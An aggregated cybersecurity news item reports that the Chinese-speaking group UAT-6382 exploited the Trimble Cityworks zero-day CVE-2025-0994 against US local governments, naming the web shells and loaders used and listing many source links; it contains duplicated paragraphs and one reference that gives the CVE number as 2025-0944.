CyberSecurity news
FlagThis
info@thehackernews.com (The@The Hacker News
//
Chinese-speaking hackers have exploited a zero-day vulnerability, CVE-2025-0994, in Trimble Cityworks software to breach multiple local governing bodies across the United States. This vulnerability, a remote code execution flaw, has been actively exploited since January 2025 by a threat actor tracked as UAT-6382. The attackers targeted enterprise networks of local governing bodies, conducting reconnaissance and deploying web shells and custom-made malware to maintain long-term access, with a particular interest in systems related to utilities management.
UAT-6382 utilized a variety of tools and techniques in their attacks. They rapidly deployed web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. Additionally, they employed Rust-based loaders, known as TetraLoader, to deliver Cobalt Strike and VShell malware, ensuring persistent access to compromised systems. The TetraLoader was built using MaLoader, a malware building framework written in Simplified Chinese, further indicating the origin of the threat actor.
Cisco Talos researchers have assessed with high confidence that UAT-6382 is a Chinese-speaking threat actor, based on tooling, TTPs, hands-on-keyboard activity, and victimology. Indicators of compromise (IOCs) related to these intrusions overlap with those listed in Trimble’s advisory. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog in February 2025. The exploitation of this flaw highlights the risk of nation-state actors targeting critical infrastructure software used by U.S. local governments and utilities.
ImgSrc: blogger.googleu
References :
UAT-6382 utilized a variety of tools and techniques in their attacks. They rapidly deployed web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. Additionally, they employed Rust-based loaders, known as TetraLoader, to deliver Cobalt Strike and VShell malware, ensuring persistent access to compromised systems. The TetraLoader was built using MaLoader, a malware building framework written in Simplified Chinese, further indicating the origin of the threat actor.
Cisco Talos researchers have assessed with high confidence that UAT-6382 is a Chinese-speaking threat actor, based on tooling, TTPs, hands-on-keyboard activity, and victimology. Indicators of compromise (IOCs) related to these intrusions overlap with those listed in Trimble’s advisory. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog in February 2025. The exploitation of this flaw highlights the risk of nation-state actors targeting critical infrastructure software used by U.S. local governments and utilities.
ImgSrc: blogger.googleu
Share:
References :
- Cisco Talos Blog: Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.
- securityonline.info: Critical 0-Day: Cityworks Flaw Actively Exploited by Chinese APT UAT-6382
- The Hacker News: Chinese Hackers Exploit Trimble Cityworks Flaw to Infiltrate U.S. Government Networks
- BleepingComputer: Chinese hackers breach US local governments using Cityworks zero-day
- bsky.app: Cisco Talos says a group tracked as UAT-6382 has used a recent Trimble CityWorks zero-day (CVE-2025-0944) to breach local governing bodies in the US
- securityonline.info: SecurityOnline.info article on critical 0-day Cityworks flaw exploited by Chinese APT UAT-6382
- malware.news: Trimble Cityworks zero-day attacks on US local governments detailed
- The DefendOps Diaries: Chinese Hackers Exploit Cityworks Zero-Day Vulnerability in US Local Governments
- www.scworld.com: Trimble Cityworks zero-day attacks on US local governments detailed
- The DefendOps Diaries: Exploitation of Ivanti EPMM Vulnerabilities by Chinese Hackers: A Detailed Analysis
- BleepingComputer: Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies
- securityaffairs.com: Chinese threat actors exploited Trimble Cityworks flaw to breach U.S. local government networks
- www.csoonline.com: A now-patched high-severity security flaw affecting Trimble Cityworks — a specialized software used by local governments in the US, utilities, and public agencies to manage their infrastructure and community services—was abused by Chinese hackers to compromise systems before a patch was available.
- blog.talosintelligence.com: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
- www.techradar.com: The Chinese used the Cityworks bug to deploy Cobalt Strike beacons and backdoors.
- www.cybersecuritydive.com: Cisco Talos researchers attribute the exploitation of the CVE-2025-0994 in Trimble Cityworks to Chinese-speaking threat actor UAT-6382, based on tools and TTPs used in the intrusions.
- www.csoonline.com: A now-patched high-severity security flaw affecting Trimble Cityworks — a specialized software used by local governments in the US, utilities, and public agencies to manage their infrastructure and community services—was abused by Chinese hackers to compromise systems before a patch was available.
- Blog: The Chinese-speaking cyber-espionage group identified as UAT-6382 has been observed exploiting a critical vulnerability in Trimble's Cityworks software to infiltrate U.S. government networks.
- StateScoop: Report: Chinese hackers used Cityworks vulnerability to deliver malware
- Cisco Talos Blog: Hazel observes that cybercriminals often fumble teamwork, with fragile alliances crumbling over missed messages. Plus, how UAT-6382 is exploiting Cityworks and what you can do to stay secure.
- hackread.com: Warnings on active exploitation of a zero-day vulnerability (CVE-2025-0994) in Cityworks.